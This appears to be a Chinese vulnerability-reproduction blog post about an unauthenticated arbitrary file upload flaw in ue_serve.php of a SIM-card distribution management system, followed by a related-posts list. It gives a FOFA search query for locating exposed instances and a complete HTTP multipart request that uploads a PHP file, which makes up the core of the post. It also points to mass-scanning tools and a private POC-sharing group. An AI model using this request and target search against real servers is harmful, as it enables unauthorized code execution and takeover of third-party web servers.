【漏洞复现】号卡极团分销管理系统 ue_serve.php 任意文件上传漏洞

0x01 产品简介

号卡极团分销 管理系统,同步对接多平台,同步订单信息,支持敢探号一键上架,首页多套U|+商品下单页多套模板,订单查询支持实时物流信息、支持代理商自定义域名、泛域名绑定,内置敢探号、172平台、号氪云平台第三方接口以及号卡网同系统对接.

0x02 漏洞概述

号卡极团分销管理系统 ue_serve.php 存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 搜索语法

bash 复制代码
FOFA:icon_hash="-795291075"

0x04 漏洞复现

bash 复制代码
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylkv1kpsZgzw2WC03
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
 
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="name"
 
test.php
------WebKitFormBoundarylkv1kpsZgzw2WC03
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: image/jpeg
 
<?php print(111*222);unlink(__FILE__);?>
------WebKitFormBoundarylkv1kpsZgzw2WC03--

0x05 工具批量

nuclei

afrog

xray

POC获取

请使用VX扫一扫加入内部POC分享圈子

相关推荐
见欢.4 天前
upload-labs靶场1-19关
文件上传
2401_883879794 天前
upload-labs(1-19关)通关攻略
靶场·upload·文件上传
anyview931 个月前
Http文件上传
java·文件上传
摘星怪sec1 个月前
【漏洞复现】|百易云资产管理运营系统/mobilefront/c/2.php前台文件上传
网络安全·文件上传·漏洞复现
RrEeSsEeTt1 个月前
制作图片马常用的五种方法总结
web安全·网络安全·渗透测试·文件上传·木马·一句话木马
冰水°1 个月前
3.1_文件上传漏洞
安全·网络安全·文件上传·条件竞争·.htaccess·文件上传绕过
web前端神器1 个月前
利用nodejs后端传视频文件到服务器笔记
笔记·后端·node.js·文件上传
cooldream20091 个月前
Spring Boot实现文件上传与OSS集成:从基础到应用
spring boot·后端·文件上传·oos
永恒之月℡1 个月前
JavaWeb合集23-文件上传
java·javaweb·文件上传
@PHARAOH2 个月前
WHAT - Excel 文件上传解析与编码
前端·javascript·excel·文件上传